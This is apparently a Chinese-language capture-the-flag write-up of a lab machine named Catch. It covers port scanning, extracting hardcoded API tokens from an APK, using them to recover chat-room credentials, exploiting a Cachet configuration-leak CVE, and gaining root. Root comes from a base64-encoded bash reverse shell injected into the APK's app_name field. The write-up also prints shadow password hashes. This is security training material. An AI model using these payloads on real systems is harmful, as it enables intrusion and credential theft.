基本信息

端口扫描

22,80,3000,5000,8000:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
$ nmap -sC -sV 10.10.11.150
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-08 13:28 CST
Nmap scan report for 10.10.11.150
Host is up (0.20s latency).
Not shown: 995 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Catch Global Systems
|_http-server-header: Apache/2.4.41 (Ubuntu)
3000/tcp open  ppp?
| fingerprint-strings:
|   GenericLines, Help, RTSPRequest:
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest:
|     HTTP/1.0 200 OK
|     Content-Type: text/html; charset=UTF-8
|     Set-Cookie: i_like_gitea=cae8621f0dff94e3; Path=/; HttpOnly
|     Set-Cookie: _csrf=7M4wTONaVHZ3hEuwqiFsqOLml-Y6MTY0OTM5NTc1NzMxOTI1Mzc4NQ; Path=/; Expires=Sat, 09 Apr 2022 05:29:17 GMT; HttpOnly; SameSite=Lax
|     Set-Cookie: macaron_flash=; Path=/; Max-Age=0; HttpOnly
|     X-Frame-Options: SAMEORIGIN
|     Date: Fri, 08 Apr 2022 05:29:17 GMT
|     <!DOCTYPE html>
|     <html lang="en-US" class="theme-">
|     <head data-suburl="">
|     <meta charset="utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <title> Catch Repositories </title>
|     <link rel="manifest" href="data:application/json;base64,eyJuYW1lIjoiQ2F0Y2ggUmVwb3NpdG9yaWVzIiwic2hvcnRfbmFtZSI6IkNhdGNoIFJlcG9zaXRvcmllcyIsInN0YXJ0X3VybCI6Imh0dHA6Ly9naXRlYS5jYXRjaC5odGI6MzAwMC8iLCJpY29ucyI6W3sic3JjIjoiaHR0cDovL2dpdGVhLmNhdGNoLmh0Yjoz
|   HTTPOptions:
|     HTTP/1.0 405 Method Not Allowed
|     Set-Cookie: i_like_gitea=3310d23dba07b622; Path=/; HttpOnly
|     Set-Cookie: _csrf=gfXxdWe0pNU-2yj7CJmpTYTBtQ46MTY0OTM5NTc2MzM3MTk3ODkzMA; Path=/; Expires=Sat, 09 Apr 2022 05:29:23 GMT; HttpOnly; SameSite=Lax
|     Set-Cookie: macaron_flash=; Path=/; Max-Age=0; HttpOnly
|     X-Frame-Options: SAMEORIGIN
|     Date: Fri, 08 Apr 2022 05:29:23 GMT
|_    Content-Length: 0
5000/tcp open  upnp?
| fingerprint-strings:
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, Help, RPCCheck, RTSPRequest, SMBProgNeg, ZendJavaBridge:
|     HTTP/1.1 400 Bad Request
|     Connection: close
|   GetRequest:
|     HTTP/1.1 302 Found
|     X-Frame-Options: SAMEORIGIN
|     X-Download-Options: noopen
|     X-Content-Type-Options: nosniff
|     X-XSS-Protection: 1; mode=block
|     Content-Security-Policy:
|     X-Content-Security-Policy:
|     X-WebKit-CSP:
|     X-UA-Compatible: IE=Edge,chrome=1
|     Location: /login
|     Vary: Accept, Accept-Encoding
|     Content-Type: text/plain; charset=utf-8
|     Content-Length: 28
|     Set-Cookie: connect.sid=s%3AXXp6I72QuCEosvZoFuxBEZ0bpCuwBcMr.yyPLpvTFJxYads2rdwaRU3nMijrdq4miYZLeG3SGuIU; Path=/; HttpOnly
|     Date: Fri, 08 Apr 2022 05:29:22 GMT
|     Connection: close
|     Found. Redirecting to /login
|   HTTPOptions:
|     HTTP/1.1 200 OK
|     X-Frame-Options: SAMEORIGIN
|     X-Download-Options: noopen
|     X-Content-Type-Options: nosniff
|     X-XSS-Protection: 1; mode=block
|     Content-Security-Policy:
|     X-Content-Security-Policy:
|     X-WebKit-CSP:
|     X-UA-Compatible: IE=Edge,chrome=1
|     Allow: GET,HEAD
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 8
|     ETag: W/"8-ZRAf8oNBS3Bjb/SU2GYZCmbtmXg"
|     Set-Cookie: connect.sid=s%3AaOwhTa3pPTNrGsrD5qPMN7SaVBU9Jxpm.G3CN12m3ivfC%2B9bHgwJ0Svaec%2FJWqcT9Ija4G7ZVCdc; Path=/; HttpOnly
|     Vary: Accept-Encoding
|     Date: Fri, 08 Apr 2022 05:29:24 GMT
|     Connection: close
|_    GET,HEAD
8000/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Catch Global Systems
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port3000-TCP:V=7.92%I=7%D=4/8%Time=624FC82C%P=x86_64-apple-darwin20.4.0
SF:%r(GenericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:
SF:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20
SF:Bad\x20Request")%r(GetRequest,30E3,"HTTP/1\.0\x20200\x20OK\r\nContent-T
SF:ype:\x20text/html;\x20charset=UTF-8\r\nSet-Cookie:\x20i_like_gitea=cae8
SF:621f0dff94e3;\x20Path=/;\x20HttpOnly\r\nSet-Cookie:\x20_csrf=7M4wTONaVH
SF:Z3hEuwqiFsqOLml-Y6MTY0OTM5NTc1NzMxOTI1Mzc4NQ;\x20Path=/;\x20Expires=Sat
SF:,\x2009\x20Apr\x202022\x2005:29:17\x20GMT;\x20HttpOnly;\x20SameSite=Lax
SF:\r\nSet-Cookie:\x20macaron_flash=;\x20Path=/;\x20Max-Age=0;\x20HttpOnly
SF:\r\nX-Frame-Options:\x20SAMEORIGIN\r\nDate:\x20Fri,\x2008\x20Apr\x20202
SF:2\x2005:29:17\x20GMT\r\n\r\n<!DOCTYPE\x20html>\n<html\x20lang=\"en-US\"
SF:\x20class=\"theme-\">\n<head\x20data-suburl=\"\">\n\t<meta\x20charset=\
SF:"utf-8\">\n\t<meta\x20name=\"viewport\"\x20content=\"width=device-width
SF:,\x20initial-scale=1\">\n\t<meta\x20http-equiv=\"x-ua-compatible\"\x20c
SF:ontent=\"ie=edge\">\n\t<title>\x20Catch\x20Repositories\x20</title>\n\t
SF:<link\x20rel=\"manifest\"\x20href=\"data:application/json;base64,eyJuYW
SF:1lIjoiQ2F0Y2ggUmVwb3NpdG9yaWVzIiwic2hvcnRfbmFtZSI6IkNhdGNoIFJlcG9zaXRvc
SF:mllcyIsInN0YXJ0X3VybCI6Imh0dHA6Ly9naXRlYS5jYXRjaC5odGI6MzAwMC8iLCJpY29u
SF:cyI6W3sic3JjIjoiaHR0cDovL2dpdGVhLmNhdGNoLmh0Yjoz")%r(Help,67,"HTTP/1\.1
SF:\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=ut
SF:f-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(HTTPOption
SF:s,17F,"HTTP/1\.0\x20405\x20Method\x20Not\x20Allowed\r\nSet-Cookie:\x20i
SF:_like_gitea=3310d23dba07b622;\x20Path=/;\x20HttpOnly\r\nSet-Cookie:\x20
SF:_csrf=gfXxdWe0pNU-2yj7CJmpTYTBtQ46MTY0OTM5NTc2MzM3MTk3ODkzMA;\x20Path=/
SF:;\x20Expires=Sat,\x2009\x20Apr\x202022\x2005:29:23\x20GMT;\x20HttpOnly;
SF:\x20SameSite=Lax\r\nSet-Cookie:\x20macaron_flash=;\x20Path=/;\x20Max-Ag
SF:e=0;\x20HttpOnly\r\nX-Frame-Options:\x20SAMEORIGIN\r\nDate:\x20Fri,\x20
SF:08\x20Apr\x202022\x2005:29:23\x20GMT\r\nContent-Length:\x200\r\n\r\n")%
SF:r(RTSPRequest,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x
SF:20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Ba
SF:d\x20Request");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port5000-TCP:V=7.92%I=7%D=4/8%Time=624FC831%P=x86_64-apple-darwin20.4.0
SF:%r(GetRequest,23A,"HTTP/1\.1\x20302\x20Found\r\nX-Frame-Options:\x20SAM
SF:EORIGIN\r\nX-Download-Options:\x20noopen\r\nX-Content-Type-Options:\x20
SF:nosniff\r\nX-XSS-Protection:\x201;\x20mode=block\r\nContent-Security-Po
SF:licy:\x20\r\nX-Content-Security-Policy:\x20\r\nX-WebKit-CSP:\x20\r\nX-U
SF:A-Compatible:\x20IE=Edge,chrome=1\r\nLocation:\x20/login\r\nVary:\x20Ac
SF:cept,\x20Accept-Encoding\r\nContent-Type:\x20text/plain;\x20charset=utf
SF:-8\r\nContent-Length:\x2028\r\nSet-Cookie:\x20connect\.sid=s%3AXXp6I72Q
SF:uCEosvZoFuxBEZ0bpCuwBcMr\.yyPLpvTFJxYads2rdwaRU3nMijrdq4miYZLeG3SGuIU;\
SF:x20Path=/;\x20HttpOnly\r\nDate:\x20Fri,\x2008\x20Apr\x202022\x2005:29:2
SF:2\x20GMT\r\nConnection:\x20close\r\n\r\nFound\.\x20Redirecting\x20to\x2
SF:0/login")%r(RTSPRequest,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConne
SF:ction:\x20close\r\n\r\n")%r(DNSVersionBindReqTCP,2F,"HTTP/1\.1\x20400\x
SF:20Bad\x20Request\r\nConnection:\x20close\r\n\r\n")%r(SMBProgNeg,2F,"HTT
SF:P/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\r\n\r\n")%r(Zen
SF:dJavaBridge,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20cl
SF:ose\r\n\r\n")%r(HTTPOptions,245,"HTTP/1\.1\x20200\x20OK\r\nX-Frame-Opti
SF:ons:\x20SAMEORIGIN\r\nX-Download-Options:\x20noopen\r\nX-Content-Type-O
SF:ptions:\x20nosniff\r\nX-XSS-Protection:\x201;\x20mode=block\r\nContent-
SF:Security-Policy:\x20\r\nX-Content-Security-Policy:\x20\r\nX-WebKit-CSP:
SF:\x20\r\nX-UA-Compatible:\x20IE=Edge,chrome=1\r\nAllow:\x20GET,HEAD\r\nC
SF:ontent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x208\r\n
SF:ETag:\x20W/\"8-ZRAf8oNBS3Bjb/SU2GYZCmbtmXg\"\r\nSet-Cookie:\x20connect\
SF:.sid=s%3AaOwhTa3pPTNrGsrD5qPMN7SaVBU9Jxpm\.G3CN12m3ivfC%2B9bHgwJ0Svaec%
SF:2FJWqcT9Ija4G7ZVCdc;\x20Path=/;\x20HttpOnly\r\nVary:\x20Accept-Encoding
SF:\r\nDate:\x20Fri,\x2008\x20Apr\x202022\x2005:29:24\x20GMT\r\nConnection
SF::\x20close\r\n\r\nGET,HEAD")%r(RPCCheck,2F,"HTTP/1\.1\x20400\x20Bad\x20
SF:Request\r\nConnection:\x20close\r\n\r\n")%r(DNSStatusRequestTCP,2F,"HTT
SF:P/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\r\n\r\n")%r(Hel
SF:p,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\r\n\r\
SF:n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 152.22 seconds

80

主站,提供一个apk下载:

3000

gitea 1.14.1:

5000

lets chat:

8000

Cachet:

catchv1.0.apk

apk反编译,其中有几个硬编码的token:

1
2
3
<string name="gitea_token">b87bfb6345ae72ed5ecdcee05bcb34c83806fbd0</string>
<string name="lets_chat_token">NjFiODZhZWFkOTg0ZTI0NTEwMzZlYjE2OmQ1ODg0NjhmZjhiYWU0NDYzNzlhNTdmYTJiNGU2M2EyMzY4MjI0MzM2YjU5NDljNQ==</string>
<string name="slack_token">xoxp-23984754863-2348975623103</string>

lets-chat

根据文档,使用token调用API, 在其中一个room中得到一组账号密码,并且根据status的域名可以知道应该是8000端口那里的:

1
2
3
4
5
6
7
8
9
10
11
12
curl -H "Authorization: bearer NjFiODZhZWFkOTg0ZTI0NTEwMzZlYjE2OmQ1ODg0NjhmZjhiYWU0NDYzNzlhNTdmYTJiNGU2M2EyMzY4MjI0MzM2YjU5NDljNQ==" "http://10.10.11.150:5000/rooms" | jq
curl -H "Authorization: bearer NjFiODZhZWFkOTg0ZTI0NTEwMzZlYjE2OmQ1ODg0NjhmZjhiYWU0NDYzNzlhNTdmYTJiNGU2M2EyMzY4MjI0MzM2YjU5NDljNQ==" "http://10.10.11.150:5000/rooms/61b86b28d984e2451036eb17/messages" | jq

{
    "id": "61b8702dfe190b466d476bfa",
    "text": "Here are the credentials `john :  E}V!mywu_69T4C}W`",
    "posted": "2021-12-14T10:21:33.859Z",
    "owner": "61b86f15fe190b466d476bf5",
    "room": "61b86b28d984e2451036eb17"
 },
 
 status.catch.htb

cachet

得到的账号密码登录8000端口的Cachet,设置里得到版本号,2.4.0-dev:

可以搜到相关漏洞:

CVE-2021-39174

这里可以利用其中的一个,来获取配置文件相关信息,修改,保存,再去查看就能够获取到配置数据:

1
2
${DB_USERNAME} will
${DB_PASSWORD} s2#4Fg0_%3!

user flag

上面得到的账号密码ssh登录,得到user.txt:

提权信息

/opt/mdm/verify.sh,其中app_check函数从apk中获取APP_NAME后拼接,存在命令注入:

/opt/mdm/verify.sh

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
#!/bin/bash

###################
# Signature Check #
###################

sig_check() {
	jarsigner -verify "$1/$2" 2>/dev/null >/dev/null
	if [[ $? -eq 0 ]]; then
		echo '[+] Signature Check Passed'
	else
		echo '[!] Signature Check Failed. Invalid Certificate.'
		cleanup
		exit
	fi
}

#######################
# Compatibility Check #
#######################

comp_check() {
	apktool d -s "$1/$2" -o $3 2>/dev/null >/dev/null
	COMPILE_SDK_VER=$(grep -oPm1 "(?<=compileSdkVersion=\")[^\"]+" "$PROCESS_BIN/AndroidManifest.xml")
	if [ -z "$COMPILE_SDK_VER" ]; then
		echo '[!] Failed to find target SDK version.'
		cleanup
		exit
	else
		if [ $COMPILE_SDK_VER -lt 18 ]; then
			echo "[!] APK Doesn't meet the requirements"
			cleanup
			exit
		fi
	fi
}

####################
# Basic App Checks #
####################

app_check() {
	APP_NAME=$(grep -oPm1 "(?<=<string name=\"app_name\">)[^<]+" "$1/res/values/strings.xml")
	echo $APP_NAME
	if [[ $APP_NAME == *"Catch"* ]]; then
		echo -n $APP_NAME|xargs -I {} sh -c 'mkdir {}'
		mv "$3/$APK_NAME" "$2/$APP_NAME/$4"
	else
		echo "[!] App doesn't belong to Catch Global"
		cleanup
		exit
	fi
}


###########
# Cleanup #
###########

cleanup() {
	rm -rf $PROCESS_BIN;rm -rf "$DROPBOX/*" "$IN_FOLDER/*";rm -rf $(ls -A /opt/mdm | grep -v apk_bin | grep -v verify.sh)
}


###################
# MDM CheckerV1.0 #
###################

DROPBOX=/opt/mdm/apk_bin
IN_FOLDER=/root/mdm/apk_bin
OUT_FOLDER=/root/mdm/certified_apps
PROCESS_BIN=/root/mdm/process_bin

for IN_APK_NAME in $DROPBOX/*.apk;do
	OUT_APK_NAME="$(echo ${IN_APK_NAME##*/} | cut -d '.' -f1)_verified.apk"
	APK_NAME="$(openssl rand -hex 12).apk"
	if [[ -L "$IN_APK_NAME" ]]; then
		exit
	else
		mv "$IN_APK_NAME" "$IN_FOLDER/$APK_NAME"
	fi
	sig_check $IN_FOLDER $APK_NAME
	comp_check $IN_FOLDER $APK_NAME $PROCESS_BIN
	app_check $PROCESS_BIN $OUT_FOLDER $IN_FOLDER $OUT_APK_NAME
done
cleanup

提权 & root flag

修改apk,在appname里注入命令,重新打包后签名,然后将生成的apk上传到对应目录,等待命令执行:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
echo '/bin/bash -i >& /dev/tcp/10.10.14.13/4444 0>&1' | base64
L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjEzLzQ0NDQgMD4mMQo=

<string name="app_name">Catch|echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjEzLzQ0NDQgMD4mMQo= | base64 -d | bash</string>

java -jar /usr/local/Cellar/apktool/2.6.1/libexec/apktool_2.6.1.jar d catchv1.0.apk

java -jar /usr/local/Cellar/apktool/2.6.1/libexec/apktool_2.6.1.jar b -f -d catchv1.0 -o catchv2.0.apk

keytool -genkey -v -keystore my-release-key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.keystore catchv2.0.apk alias_name
jarsigner -verify -verbose -certs catchv2.0.apk

cp catchv2.0.apk /opt/mdm/apk_bin

root flag

shadow

1
2
root:$6$HJWtdM63SqnL6alL$h/FUZ0TNaCCrCgEzeuT9ityQcDmYcMCA0fErrvkZVBmf0TQJntGSRMDo.AXZA9V00.qAsZ04554.dUJcFszUM1:18976:0:99999:7:::
will:$6$UlC1gE5S4qWU4bz8$XLnV0mDyqZ61IwRXwC8CGLfaVbF9bJ7uMerWNz1FvjqHShP0spDJmw3O.Iz7Zt7jbvH6X4w2N9PIV6NL6Hhjy.:18976:0:99999:7:::

参考资料